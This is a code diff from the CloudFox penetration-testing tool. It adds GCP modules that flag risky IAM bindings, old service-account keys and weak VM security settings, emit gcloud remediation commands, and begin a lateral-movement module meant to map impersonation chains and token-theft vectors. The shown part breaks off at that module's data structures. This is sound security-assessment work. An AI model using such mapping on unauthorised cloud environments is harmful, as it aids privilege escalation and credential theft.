module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IdentityProtectionModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing identity risks and policy recommendations...", GCP_IDENTITYPROTECTION_MODULE_NAME) + + // Create service clients + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Resource Manager service: %v", err), GCP_IDENTITYPROTECTION_MODULE_NAME) + return + } + + iamService, err := iam.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create IAM service: %v", err), GCP_IDENTITYPROTECTION_MODULE_NAME) + return + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, crmService, iamService, logger) + }(projectID) + } + wg.Wait() + + // Analyze and summarize risks + m.summarizeRisks(logger) + + // Check results + totalRisks := len(m.RiskyBindings) + len(m.ServiceAccountRisks) + len(m.ExternalIdentities) + if totalRisks == 0 { + logger.InfoM("No identity risks found", GCP_IDENTITYPROTECTION_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d risky binding(s), %d service account risk(s), %d external identity(ies)", + len(m.RiskyBindings), len(m.ServiceAccountRisks), len(m.ExternalIdentities)), GCP_IDENTITYPROTECTION_MODULE_NAME) + + if m.allUsersCount > 0 || m.allAuthCount > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] Found %d allUsers and %d allAuthenticatedUsers bindings!", + m.allUsersCount, m.allAuthCount), GCP_IDENTITYPROTECTION_MODULE_NAME) + } + + if m.ownerCount > 0 || m.editorCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] Found %d Owner and %d Editor role bindings", + m.ownerCount, m.editorCount), GCP_IDENTITYPROTECTION_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *IdentityProtectionModule) processProject(ctx context.Context, projectID string, crmService *cloudresourcemanager.Service, iamService *iam.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing identities for project: %s", projectID), GCP_IDENTITYPROTECTION_MODULE_NAME) + } + + // Analyze IAM policy bindings + m.analyzeIAMPolicy(ctx, projectID, crmService, logger) + + // Analyze service accounts + m.analyzeServiceAccounts(ctx, projectID, iamService, logger) +} + +func (m *IdentityProtectionModule) analyzeIAMPolicy(ctx context.Context, projectID string, crmService *cloudresourcemanager.Service, logger internal.Logger) { + // Get IAM policy for the project + policy, err := crmService.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting IAM policy for project %s: %v", projectID, err), GCP_IDENTITYPROTECTION_MODULE_NAME) + } + return + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + m.analyzeBinding(member, binding.Role, projectID, "project", logger) + } + } +} + +func (m *IdentityProtectionModule) analyzeBinding(member, role, projectID, resourceType string, logger internal.Logger) { + riskLevel := "LOW" + riskReason := "" + recommendation := "" + bindingType := m.getBindingType(member) + + // Check for allUsers/allAuthenticatedUsers (CRITICAL) + if member == "allUsers" { + riskLevel = "CRITICAL" + riskReason = "Public access: allUsers grants access to anyone on the internet" + recommendation = "Remove allUsers binding immediately unless intentionally public" + m.mu.Lock() + m.allUsersCount++ + m.mu.Unlock() + } else if member == "allAuthenticatedUsers" { + riskLevel = "CRITICAL" + riskReason = "Any Google account: allAuthenticatedUsers grants access to any authenticated Google user" + recommendation = "Replace with specific users/groups or use IAM Conditions" + m.mu.Lock() + m.allAuthCount++ + m.mu.Unlock() + } + + // Check for Owner/Editor roles (HIGH) + if strings.Contains(role, "roles/owner") { + if riskLevel != "CRITICAL" { + riskLevel = "HIGH" + } + riskReason = "Owner role: Full administrative access including IAM management" + recommendation = "Replace with specific roles following least privilege principle" + m.mu.Lock() + m.ownerCount++ + m.mu.Unlock() + } else if strings.Contains(role, "roles/editor") { + if riskLevel != "CRITICAL" { + riskLevel = "HIGH" + } + riskReason = "Editor role: Broad modify access to most resources" + recommendation = "Replace with specific roles for required services only" + m.mu.Lock() + m.editorCount++ + m.mu.Unlock() + } + + // Check for other high-risk roles + highRiskRoles := map[string]string{ + "roles/iam.securityAdmin": "Can manage all IAM policies", + "roles/iam.serviceAccountAdmin": "Can create/delete service accounts", + "roles/iam.serviceAccountKeyAdmin": "Can create service account keys", + "roles/iam.serviceAccountTokenCreator": "Can impersonate service accounts", + "roles/resourcemanager.projectIamAdmin": "Can manage project IAM policies", + "roles/cloudfunctions.admin": "Can deploy functions with any SA", + "roles/compute.admin": "Full compute access including SSH", + "roles/storage.admin": "Full storage access", + } + + if reason, isHighRisk := highRiskRoles[role]; isHighRisk { + if riskLevel == "LOW" { + riskLevel = "MEDIUM" + riskReason = reason + recommendation = "Review if this level of access is necessary" + } + } + + // Check for external identities + if m.isExternalIdentity(member, projectID) { + if riskLevel == "LOW" { + riskLevel = "MEDIUM" + } + riskReason += "; External identity with access" + m.mu.Lock() + m.externalCount++ + + // Track external identity + domain := m.extractDomain(member) + external := ExternalIdentity{ + Principal: member, + IdentityType: bindingType, + Domain: domain, + Roles: []string{role}, + Resources: []string{projectID}, + ProjectID: projectID, + RiskLevel: riskLevel, + Details: fmt.Sprintf("External %s with %s role", bindingType, role), + } + m.ExternalIdentities = append(m.ExternalIdentities, external) + m.mu.Unlock() + } + + // Only track if there's a risk + if riskLevel != "LOW" || m.isHighPrivilegeRole(role) { + risky := RiskyBinding{ + Principal: member, + Role: role, + Resource: projectID, + ResourceType: resourceType, + ProjectID: projectID, + RiskLevel: riskLevel, + RiskReason: riskReason, + Recommendation: recommendation, + BindingType: bindingType, + } + + m.mu.Lock() + m.RiskyBindings = append(m.RiskyBindings, risky) + m.addRiskyBindingToLoot(risky) + m.mu.Unlock() + } +} + +func (m *IdentityProtectionModule) analyzeServiceAccounts(ctx context.Context, projectID string, iamService *iam.Service, logger internal.Logger) { + // List service accounts + saList, err := iamService.Projects.ServiceAccounts.List(fmt.Sprintf("projects/%s", projectID)).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing service accounts for project %s: %v", projectID, err), GCP_IDENTITYPROTECTION_MODULE_NAME) + } + return + } + + for _, sa := range saList.Accounts { + saRisk := ServiceAccountRisk{ + Email: sa.Email, + ProjectID: projectID, + DisplayName: sa.DisplayName, + RiskLevel: "LOW", + RiskReasons: []string{}, + Recommendations: []string{}, + } + + // Check for domain-wide delegation + if sa.Oauth2ClientId != "" { + // Service account has OAuth client ID, may have domain-wide delegation + saRisk.DomainWideDelegation = true + saRisk.RiskLevel = "CRITICAL" + saRisk.RiskReasons = append(saRisk.RiskReasons, "Domain-wide delegation enabled - can impersonate any user in the domain") + saRisk.Recommendations = append(saRisk.Recommendations, "Review and restrict domain-wide delegation scopes") + } + + // List service account keys + keysResp, err := iamService.Projects.ServiceAccounts.Keys.List(fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email)).Do() + if err == nil { + userManagedKeys := 0 + var oldestKeyAge int + + for _, key := range keysResp.Keys { + if key.KeyType == "USER_MANAGED" { + userManagedKeys++ + saRisk.HasUserManagedKey = true + + // Check key age + validAfter, err := time.Parse(time.RFC3339, key.ValidAfterTime) + if err == nil { + keyAge := int(time.Since(validAfter).Hours() / 24) + if keyAge > oldestKeyAge { + oldestKeyAge = keyAge + } + } + } + } + + saRisk.KeyCount = userManagedKeys + saRisk.OldestKeyAge = oldestKeyAge + + if userManagedKeys > 0 { + if saRisk.RiskLevel == "LOW" { + saRisk.RiskLevel = "MEDIUM" + } + saRisk.RiskReasons = append(saRisk.RiskReasons, fmt.Sprintf("%d user-managed key(s) exist", userManagedKeys)) + saRisk.Recommendations = append(saRisk.Recommendations, "Use workload identity or short-lived tokens instead of keys") + } + + if oldestKeyAge > 90 { + if saRisk.RiskLevel == "LOW" || saRisk.RiskLevel == "MEDIUM" { + saRisk.RiskLevel = "HIGH" + } + saRisk.RiskReasons = append(saRisk.RiskReasons, fmt.Sprintf("Oldest key is %d days old (>90 days)", oldestKeyAge)) + saRisk.Recommendations = append(saRisk.Recommendations, "Rotate service account keys - keys should be rotated every 90 days") + } + } + + // Check for default compute service account + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + saRisk.RiskReasons = append(saRisk.RiskReasons, "Default Compute Engine service account - often over-privileged") + saRisk.Recommendations = append(saRisk.Recommendations, "Create custom service accounts with minimal permissions") + } + + // Check for App Engine default service account + if strings.Contains(sa.Email, "@appspot.gserviceaccount.com") { + saRisk.RiskReasons = append(saRisk.RiskReasons, "App Engine default service account") + saRisk.Recommendations = append(saRisk.Recommendations, "Review App Engine service account permissions") + } + + // Only add if there are risks + if len(saRisk.RiskReasons) > 0 { + m.mu.Lock() + m.ServiceAccountRisks = append(m.ServiceAccountRisks, saRisk) + m.addServiceAccountRiskToLoot(saRisk) + m.mu.Unlock() + } + } +} + +// ------------------------------ +// Risk Analysis +// ------------------------------ +func (m *IdentityProtectionModule) summarizeRisks(logger internal.Logger) { + m.mu.Lock() + defer m.mu.Unlock() + + // Summarize allUsers/allAuthenticatedUsers + if m.allUsersCount > 0 { + m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ + RiskType: "public-access", + Severity: "CRITICAL", + AffectedCount: m.allUsersCount, + Description: "Resources accessible to anyone on the internet", + Mitigation: "Remove allUsers bindings unless resource is intentionally public", + }) + } + + if m.allAuthCount > 0 { + m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ + RiskType: "all-authenticated-users", + Severity: "CRITICAL", + AffectedCount: m.allAuthCount, + Description: "Resources accessible to any Google account holder", + Mitigation: "Replace with specific users/groups or domain restrictions", + }) + } + + // Summarize Owner/Editor roles + if m.ownerCount > 0 { + m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ + RiskType: "owner-role", + Severity: "HIGH", + AffectedCount: m.ownerCount, + Description: "Owner role grants full administrative access", + Mitigation: "Use specific admin roles instead of Owner", + }) + } + + if m.editorCount > 0 { + m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ + RiskType: "editor-role", + Severity: "HIGH", + AffectedCount: m.editorCount, + Description: "Editor role grants broad modify access", + Mitigation: "Replace with service-specific roles", + }) + } + + // Summarize external access + if m.externalCount > 0 { + m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ + RiskType: "external-access", + Severity: "MEDIUM", + AffectedCount: m.externalCount, + Description: "External identities have access to resources", + Mitigation: "Review and document external access requirements", + }) + } + + // Count domain-wide delegation + dwdCount := 0 + for _, sa := range m.ServiceAccountRisks { + if sa.DomainWideDelegation { + dwdCount++ + } + } + if dwdCount > 0 { + m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ + RiskType: "domain-wide-delegation", + Severity: "CRITICAL", + AffectedCount: dwdCount, + Description: "Service accounts with domain-wide delegation can impersonate any domain user", + Mitigation: "Restrict delegation scopes to minimum required", + }) + } + + // Count old keys + oldKeyCount := 0 + for _, sa := range m.ServiceAccountRisks { + if sa.OldestKeyAge > 90 { + oldKeyCount++ + } + } + if oldKeyCount > 0 { + m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ + RiskType: "old-service-account-keys", + Severity: "HIGH", + AffectedCount: oldKeyCount, + Description: "Service account keys older than 90 days", + Mitigation: "Implement key rotation policy or use workload identity", + }) + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *IdentityProtectionModule) getBindingType(member string) string { + switch { + case member == "allUsers": + return "allUsers" + case member == "allAuthenticatedUsers": + return "allAuthenticatedUsers" + case strings.HasPrefix(member, "user:"): + return "user" + case strings.HasPrefix(member, "serviceAccount:"): + return "serviceAccount" + case strings.HasPrefix(member, "group:"): + return "group" + case strings.HasPrefix(member, "domain:"): + return "domain" + default: + return "unknown" + } +} + +func (m *IdentityProtectionModule) isExternalIdentity(member, projectID string) bool { + // Extract domain from member + domain := m.extractDomain(member) + if domain == "" { + return false + } + + // Check if it's a GCP service account in same project + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + // Extract project from SA email + parts := strings.Split(domain, ".") + if len(parts) > 0 { + saProject := parts[0] + if saProject == projectID { + return false + } + } + return true // External service account + } + + // Check against known internal domains (would need org domain) + // For now, consider external if not a GCP service account + return !strings.Contains(domain, "gserviceaccount.com") +} + +func (m *IdentityProtectionModule) extractDomain(member string) string { + // Remove prefix + parts := strings.SplitN(member, ":", 2) + if len(parts) != 2 { + return "" + } + + email := parts[1] + emailParts := strings.Split(email, "@") + if len(emailParts) != 2 { + return "" + } + + return emailParts[1] +} + +func (m *IdentityProtectionModule) isHighPrivilegeRole(role string) bool { + highPrivRoles := []string{ + "roles/owner", + "roles/editor", + "roles/iam.securityAdmin", + "roles/iam.serviceAccountAdmin", + "roles/iam.serviceAccountKeyAdmin", + "roles/iam.serviceAccountTokenCreator", + "roles/resourcemanager.projectIamAdmin", + "roles/resourcemanager.organizationAdmin", + "roles/compute.admin", + "roles/storage.admin", + "roles/bigquery.admin", + "roles/cloudsql.admin", + "roles/cloudfunctions.admin", + "roles/run.admin", + "roles/container.admin", + } + + for _, r := range highPrivRoles { + if role == r { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IdentityProtectionModule) initializeLootFiles() { + m.LootMap["risky-accounts"] = &internal.LootFile{ + Name: "risky-accounts", + Contents: "# Risky IAM Bindings\n# Generated by CloudFox\n# Review and remediate these bindings!\n\n", + } + m.LootMap["unused-permissions"] = &internal.LootFile{ + Name: "unused-permissions", + Contents: "# Unused/Over-provisioned Permissions\n# Generated by CloudFox\n\n", + } + m.LootMap["remediation-commands"] = &internal.LootFile{ + Name: "remediation-commands", + Contents: "# IAM Remediation Commands\n# Generated by CloudFox\n# Review before executing!\n\n", + } + m.LootMap["external-access"] = &internal.LootFile{ + Name: "external-access", + Contents: "# External Identity Access\n# Generated by CloudFox\n\n", + } + m.LootMap["service-account-risks"] = &internal.LootFile{ + Name: "service-account-risks", + Contents: "# Service Account Security Risks\n# Generated by CloudFox\n\n", + } +} + +func (m *IdentityProtectionModule) addRiskyBindingToLoot(binding RiskyBinding) { + m.LootMap["risky-accounts"].Contents += fmt.Sprintf( + "## %s [%s]\n"+ + "Role: %s\n"+ + "Resource: %s\n"+ + "Risk: %s\n"+ + "Recommendation: %s\n\n", + binding.Principal, + binding.RiskLevel, + binding.Role, + binding.Resource, + binding.RiskReason, + binding.Recommendation, + ) + + // Add remediation command + if binding.RiskLevel == "CRITICAL" || binding.RiskLevel == "HIGH" { + m.LootMap["remediation-commands"].Contents += fmt.Sprintf( + "# Remove %s binding for %s\n"+ + "gcloud projects remove-iam-policy-binding %s \\\n"+ + " --member=\"%s\" \\\n"+ + " --role=\"%s\"\n\n", + binding.RiskLevel, binding.Principal, + binding.ProjectID, + binding.Principal, + binding.Role, + ) + } + + // Track external access + if binding.BindingType == "user" || binding.BindingType == "serviceAccount" { + domain := m.extractDomain(binding.Principal) + if domain != "" && !strings.Contains(domain, "gserviceaccount.com") { + m.LootMap["external-access"].Contents += fmt.Sprintf( + "%s (%s) - %s on %s\n", + binding.Principal, domain, binding.Role, binding.Resource, + ) + } + } +} + +func (m *IdentityProtectionModule) addServiceAccountRiskToLoot(saRisk ServiceAccountRisk) { + m.LootMap["service-account-risks"].Contents += fmt.Sprintf( + "## %s [%s]\n"+ + "Project: %s\n"+ + "Display Name: %s\n"+ + "User-Managed Keys: %d\n"+ + "Oldest Key Age: %d days\n"+ + "Domain-Wide Delegation: %t\n"+ + "Risks:\n", + saRisk.Email, + saRisk.RiskLevel, + saRisk.ProjectID, + saRisk.DisplayName, + saRisk.KeyCount, + saRisk.OldestKeyAge, + saRisk.DomainWideDelegation, + ) + + for _, reason := range saRisk.RiskReasons { + m.LootMap["service-account-risks"].Contents += fmt.Sprintf(" - %s\n", reason) + } + + m.LootMap["service-account-risks"].Contents += "Recommendations:\n" + for _, rec := range saRisk.Recommendations { + m.LootMap["service-account-risks"].Contents += fmt.Sprintf(" - %s\n", rec) + } + m.LootMap["service-account-risks"].Contents += "\n" + + // Add key rotation commands + if saRisk.OldestKeyAge > 90 { + m.LootMap["remediation-commands"].Contents += fmt.Sprintf( + "# Rotate keys for %s (oldest key: %d days)\n"+ + "# List keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s\n"+ + "# Delete old key:\n"+ + "# gcloud iam service-accounts keys delete KEY_ID --iam-account=%s\n\n", + saRisk.Email, saRisk.OldestKeyAge, + saRisk.Email, + saRisk.Email, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *IdentityProtectionModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort risky bindings by risk level + sort.Slice(m.RiskyBindings, func(i, j int) bool { + riskOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} + return riskOrder[m.RiskyBindings[i].RiskLevel] < riskOrder[m.RiskyBindings[j].RiskLevel] + }) + + // Risky Bindings table + bindingsHeader := []string{ + "Principal", + "Role", + "Resource", + "Risk Level", + "Type", + "Risk Reason", + } + + var bindingsBody [][]string + for _, b := range m.RiskyBindings { + bindingsBody = append(bindingsBody, []string{ + truncateString(b.Principal, 40), + truncateString(b.Role, 35), + b.Resource, + b.RiskLevel, + b.BindingType, + truncateString(b.RiskReason, 40), + }) + } + + // Service Account Risks table + saRisksHeader := []string{ + "Service Account", + "Project", + "Risk Level", + "Keys", + "Key Age", + "DWD", + "Risks", + } + + var saRisksBody [][]string + for _, sa := range m.ServiceAccountRisks { + dwd := "No" + if sa.DomainWideDelegation { + dwd = "Yes" + } + + saRisksBody = append(saRisksBody, []string{ + truncateString(sa.Email, 40), + sa.ProjectID, + sa.RiskLevel, + fmt.Sprintf("%d", sa.KeyCount), + fmt.Sprintf("%d days", sa.OldestKeyAge), + dwd, + truncateString(strings.Join(sa.RiskReasons, "; "), 40), + }) + } + + // External Identities table + externalHeader := []string{ + "Identity", + "Type", + "Domain", + "Project", + "Risk Level", + "Details", + } + + var externalBody [][]string + for _, e := range m.ExternalIdentities { + externalBody = append(externalBody, []string{ + truncateString(e.Principal, 40), + e.IdentityType, + e.Domain, + e.ProjectID, + e.RiskLevel, + truncateString(e.Details, 40), + }) + } + + // Risk Summary table + summaryHeader := []string{ + "Risk Type", + "Severity", + "Affected", + "Description", + } + + var summaryBody [][]string + for _, r := range m.IdentityRisks { + summaryBody = append(summaryBody, []string{ + r.RiskType, + r.Severity, + fmt.Sprintf("%d", r.AffectedCount), + truncateString(r.Description, 50), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "risky-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + if len(saRisksBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "service-account-risks", + Header: saRisksHeader, + Body: saRisksBody, + }) + } + + if len(externalBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "external-identities", + Header: externalHeader, + Body: externalBody, + }) + } + + if len(summaryBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "identity-risks", + Header: summaryHeader, + Body: summaryBody, + }) + } + + output := IdentityProtectionOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_IDENTITYPROTECTION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 763de5a4..9b1c18b4 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -185,6 +185,22 @@ func (m *InstancesModule) initializeLootFiles() { Name: "instances-custom-metadata", Contents: "# GCP Custom Metadata Keys\n# Generated by CloudFox\n# These may contain secrets, API keys, or sensitive config\n\n", } + m.LootMap["instances-no-shielded-vm"] = &internal.LootFile{ + Name: "instances-no-shielded-vm", + Contents: "# Instances WITHOUT Shielded VM\n# Generated by CloudFox\n# These instances lack boot integrity verification\n\n", + } + m.LootMap["instances-google-managed-encryption"] = &internal.LootFile{ + Name: "instances-google-managed-encryption", + Contents: "# Instances Using Google-Managed Encryption\n# Generated by CloudFox\n# Consider CMEK for compliance requirements\n\n", + } + m.LootMap["instances-confidential-vm"] = &internal.LootFile{ + Name: "instances-confidential-vm", + Contents: "# Confidential VM Instances\n# Generated by CloudFox\n# These instances use encrypted memory\n\n", + } + m.LootMap["instances-security-recommendations"] = &internal.LootFile{ + Name: "instances-security-recommendations", + Contents: "# Compute Engine Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", + } } func (m *InstancesModule) addProjectMetadataToLoot(meta *ComputeEngineService.ProjectMetadataInfo) { @@ -409,6 +425,134 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput instance.Name, instance.Zone, instance.ProjectID, ) } + + // Shielded VM status + if !instance.ShieldedVM { + m.LootMap["instances-no-shielded-vm"].Contents += fmt.Sprintf( + "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ + "# Secure Boot: %v, vTPM: %v, Integrity Monitoring: %v\n"+ + "# Enable Shielded VM with:\n"+ + "gcloud compute instances update %s \\\n"+ + " --zone=%s \\\n"+ + " --shielded-secure-boot \\\n"+ + " --shielded-vtpm \\\n"+ + " --shielded-integrity-monitoring \\\n"+ + " --project=%s\n\n", + instance.Name, instance.ProjectID, instance.Zone, + instance.SecureBoot, instance.VTPMEnabled, instance.IntegrityMonitoring, + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // Encryption status + if instance.BootDiskEncryption == "Google-managed" || instance.BootDiskEncryption == "" { + m.LootMap["instances-google-managed-encryption"].Contents += fmt.Sprintf( + "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ + "# Boot Disk Encryption: Google-managed\n"+ + "# NOTE: Cannot change encryption on existing disks.\n"+ + "# For CMEK, create a new disk with:\n"+ + "# gcloud compute disks create %s-cmek \\\n"+ + "# --kms-key=projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY \\\n"+ + "# --zone=%s --project=%s\n\n", + instance.Name, instance.ProjectID, instance.Zone, + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // Confidential VM + if instance.ConfidentialVM { + m.LootMap["instances-confidential-vm"].Contents += fmt.Sprintf( + "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ + "# Confidential Computing: ENABLED\n"+ + "# Memory is encrypted with AMD SEV/SEV-SNP\n"+ + "# Machine Type: %s\n\n", + instance.Name, instance.ProjectID, instance.Zone, instance.MachineType, + ) + } + + // Security recommendations + m.addInstanceSecurityRecommendations(instance) +} + +// addInstanceSecurityRecommendations adds remediation commands for instance security issues +func (m *InstancesModule) addInstanceSecurityRecommendations(instance ComputeEngineService.ComputeEngineInfo) { + hasRecommendations := false + recommendations := fmt.Sprintf( + "# INSTANCE: %s (Project: %s, Zone: %s)\n", + instance.Name, instance.ProjectID, instance.Zone, + ) + + // No Shielded VM + if !instance.ShieldedVM { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Shielded VM not enabled\n"+ + "gcloud compute instances update %s \\\n"+ + " --zone=%s \\\n"+ + " --shielded-secure-boot \\\n"+ + " --shielded-vtpm \\\n"+ + " --shielded-integrity-monitoring \\\n"+ + " --project=%s\n\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // OS Login not enabled with external IP + if instance.ExternalIP != "" && !instance.OSLoginEnabled { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: External IP without OS Login\n"+ + "gcloud compute instances add-metadata %s \\\n"+ + " --zone=%s \\\n"+ + " --metadata enable-oslogin=TRUE \\\n"+ + " --project=%s\n\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // Serial port enabled + if instance.SerialPortEnabled { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Serial port access enabled\n"+ + "gcloud compute instances add-metadata %s \\\n"+ + " --zone=%s \\\n"+ + " --metadata serial-port-enable=FALSE \\\n"+ + " --project=%s\n\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // Default service account + if instance.HasDefaultSA { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Using default service account\n"+ + "# Create a custom service account with minimal permissions\n"+ + "# gcloud iam service-accounts create %s-sa --display-name='%s SA'\n"+ + "# gcloud compute instances set-service-account %s \\\n"+ + "# --zone=%s \\\n"+ + "# --service-account=%s-sa@%s.iam.gserviceaccount.com \\\n"+ + "# --scopes=cloud-platform \\\n"+ + "# --project=%s\n\n", + instance.Name, instance.Name, + instance.Name, instance.Zone, + instance.Name, instance.ProjectID, + instance.ProjectID, + ) + } + + // Broad scopes + if instance.HasCloudScopes { + hasRecommendations = true + recommendations += "# Issue: Has broad OAuth scopes (cloud-platform)\n" + + "# Recommend: Use specific scopes or Workload Identity\n" + + "# See: https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam\n\n" + } + + if hasRecommendations { + m.LootMap["instances-security-recommendations"].Contents += recommendations + "\n" + } } // ------------------------------ @@ -692,6 +836,50 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge } } + // Security configuration table + securityConfigHeader := []string{ + "Instance", + "Project ID", + "Zone", + "ShieldedVM", + "SecureBoot", + "vTPM", + "Integrity", + "Confidential", + "Encryption", + "KMS Key", + } + + var securityConfigBody [][]string + for _, instance := range m.Instances { + kmsKey := instance.BootDiskKMSKey + if kmsKey == "" { + kmsKey = "-" + } else { + // Truncate long key names + parts := strings.Split(kmsKey, "/") + if len(parts) > 0 { + kmsKey = parts[len(parts)-1] + } + } + encryption := instance.BootDiskEncryption + if encryption == "" { + encryption = "Google" + } + securityConfigBody = append(securityConfigBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + instanceBoolToCheck(instance.ShieldedVM), + instanceBoolToCheck(instance.SecureBoot), + instanceBoolToCheck(instance.VTPMEnabled), + instanceBoolToCheck(instance.IntegrityMonitoring), + instanceBoolToCheck(instance.ConfidentialVM), + encryption, + kmsKey, + }) + } + // SSH keys table (pentest-focused) sshKeysHeader := []string{ "Source", @@ -791,6 +979,13 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge }) } + // Always add security config table + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-security-config", + Header: securityConfigHeader, + Body: securityConfigBody, + }) + output := InstancesOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go new file mode 100644 index 00000000..6fed4664 --- /dev/null +++ b/gcp/commands/lateralmovement.go @@ -0,0 +1,599 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +// Module name constant +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" + +var GCPLateralMovementCommand = &cobra.Command{ + Use: GCP_LATERALMOVEMENT_MODULE_NAME, + Aliases: []string{"lateral", "pivot"}, + Short: "Map lateral movement paths, credential theft vectors, and pivot opportunities", + Long: `Identify lateral movement opportunities within and across GCP projects. + +Features: +- Maps service account impersonation chains (SA → SA → SA) +- Identifies token creator permissions (lateral movement via impersonation) +- Finds cross-project access paths +- Detects VM metadata abuse vectors +- Analyzes credential storage locations (secrets, environment variables) +- Maps attack paths from compromised identities +- Generates exploitation commands for penetration testing + +This module helps identify how an attacker could move laterally after gaining +initial access to a GCP environment.`, + Run: runGCPLateralMovementCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ImpersonationChain struct { + StartIdentity string + TargetSA string + ChainLength int + Path []string // [identity] -> [sa1] -> [sa2] -> ... + RiskLevel string // CRITICAL, HIGH, MEDIUM + ExploitCommand string +} + +type TokenTheftVector struct { + ResourceType string // "instance", "function", "cloudrun", etc. + ResourceName string + ProjectID string + ServiceAccount string + AttackVector string // "metadata", "env_var", "startup_script", etc. + RiskLevel string + ExploitCommand string +} + +type CrossProjectPath struct { + SourceProject string + TargetProject string + Principal string + Role string + AccessType string // "direct", "impersonation", "shared_vpc" + RiskLevel string +} + +type CredentialLocation struct { + ResourceType string + ResourceName string + ProjectID string + CredentialType string // "sa_key", "api_key", "secret", "env_var" + Description string + RiskLevel string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LateralMovementModule struct { + gcpinternal.BaseGCPModule + + ImpersonationChains []ImpersonationChain + TokenTheftVectors []TokenTheftVector + CrossProjectPaths []CrossProjectPath + CredentialLocations []CredentialLocation + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LateralMovementOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LateralMovementOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LateralMovementOutput) LootFiles() []internal.LootFile { return o.Loot } + +// 